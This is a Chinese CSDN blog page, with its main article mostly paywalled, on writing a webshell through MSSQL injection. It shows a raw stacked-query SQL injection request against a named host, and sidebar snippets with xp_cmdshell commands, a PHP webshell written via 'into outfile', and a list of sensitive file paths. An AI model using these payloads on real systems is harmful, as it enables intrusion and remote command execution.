mssql 获取网站绝对路径写shell

最新推荐文章于 2025-09-27 12:02:14 发布
最新推荐文章于 2025-09-27 12:02:14 发布
阅读量3.4k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 红蓝对抗-攻防安全 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/107980136
本文探讨了如何利用SQL注入漏洞来获取网站的绝对路径,并通过sqlmap工具演示了写入ASP.NET页面的过程。首先,通过创建表和验证存在SQL注入,然后利用`xp_cmdshell`执行命令获取图片路径。最后,使用sqlmap写入恶意的PHP shell到目标路径,以实现远程命令执行。

1 存在sql注入

创建表

GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1

Host: 360gongfang.com

Connection: close

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASPSESSIONIDSCSRDDQC=EKFDMMLAFPMPKBFAPLIMPBKI

验证

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Linux绝对路径和相对路径详解
m0_37449634的博客
03-17 635
在 Linux 中,简单的理解一个文件的路径,指的就是该文件存放的位置,/home/cat 就表示的是 cat 文件所存放的位置。总之,绝对路径是相对于根路径 / 的,只要文件不移动位置,那么它的绝对路径是恒定不变的;而相对路径是相对于当前所在目录而言的,随着程序的执行,当前所在目录可能会改变,因此文件的相对路径不是固定不变的。我们知道,Linux 系统中所有的文件(目录)都被组织成以根目录“/”开始的倒置的树状结构,如图 1 所示。指明一个文件存放的位置,有 2 种方法,分别是使用绝对路径和相对路径。
渗透测试之利用sql拿shell(附完整流程)【全】
ai0070411的博客
03-09 1296
SQL注入的本质是。
MSsqlL注入取得网站路径最好的方法.txt
07-18
MSsqlL注入取得网站路径最好的方法
【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法
edu_aqniu的博客
10-31 2594
exec master..xp_dirtree'd:/test' 假设我们在test里有两个文件夹test1和test2在test1里又有test3 结果显示 subdirectory depth test1 1 test3 2 test2 1 哈哈发现没有那个depth就是目录的级数 ok了,知道怎么办了吧 http://www.xxxxx.com/down/list.
mssql数据库getshell的几种方式
最新发布
you_possible的博客
09-27 723
Mssql数据库getshell
SQL Server从0到1——shell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-07 1251
exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据。注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复。
利用MSSQL getshell
热门推荐
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
MSSQL下拿WEBSEHLL
weixin_34381666的博客
11-28 165
2019独角兽企业重金招聘Python工程师标准>>> ...
mysql注入拿shell的内置函数_sql注入拿shell条件与方法(统计)
weixin_39884078的博客
02-08 1217
条件:php1:要知道网站绝对路径,能够经过报错,phpinfo界面,404界面等一些方式知道mysql2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了web3:要有file权限,默认状况下只有root有sql4:对目录要有权限,通常image之类的存放突破的目录就有shell在mysql的配置文件my.ini中,secure_file_priv="c:/wamp64/tmp"被...
在Windows中的sqlmap中如何获取目标网站绝对路径
03-27
获取绝对路径可能涉及到利用文件读取功能或者报错信息。 用户可能在渗透测试过程中需要获取目标网站绝对路径,以便进行后续的攻击,比如入webshell或者读取敏感文件。绝对路径获取方式可能有几种:通过报错...
【getshell】MySQL上传webshell
ssrf
10-20 1010
文章目录一、select into outfile直接入1、利用条件2、查看secure_file_priv值3、入一句话二、利用全局日志shell1、查看配置2、开启general_log模式3、修改日志目录为shell地址4、shell5、抹除痕迹 一、select into outfile直接入 1、利用条件 对web目录需要有权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secur
获取当前网站的路径
04-19
获取当前网站的路径
sql server附加数据库时显示绝对路径解决办法
04-17
解决sqlserver附加数据库显示句对路径的问题或附加不上数据库的问题。史上最好的解决办法,一分钟轻松解决。
mssql实验】Mssqlgetshell
一剑开天门!的博客
03-07 1328
mssql实验】Mssqlgetshell
SQL语句获取数据库文件全路径
yihuliunian的博客
04-13 3338
转载自品略图书馆http://www.pinlue.com/article/2018/09/1517/477196895458.html SQL语句获取数据库文件全路径 select filename from master.dbo.sysdatabases where name = @databasename 一些有用的系统存储过程及用法 ---------...
sql获取php网站路径,MSSQL_SQL Server取得网站路径的几种方法及比较,如果网站只开了80端口,你会 - phpStudy...
weixin_39834205的博客
03-19 211
SQL Server取得网站路径的几种方法及比较如果网站只开了80端口,你会发现下面的方法是比较有用的,其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验和技巧方法可以说有4种(现在已知的)第一种方法:这个是<>中介绍的方法利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)建立表语句:http://www.xxx...
杂七杂八的敏感文件注释<持续更新帖>
weixin_30641999的博客
05-14 151
============敏感文件读取================ WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt...
利用 mssql backup 创建webshell
Y1ch0的专栏
12-01 1094
最早想到利用数据库系统来文件大约MySQL下面的事情吧,我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的,第一步,也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。ACCESS功能不那么强大,有注入漏洞的时候也不能直接获得执行任何命令的权限,就不说了;MSSQL倒是有很多人详细研究过,执行命令的方法罗列了很多,可是没有了exec的权限,所做的还是有限。很多
SQL注入webshell
huangyongkang666的博客
03-25 3655
SQL注入webshell 1.MySQLshell 入WebShell的几种方式 1、利用Union select 入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值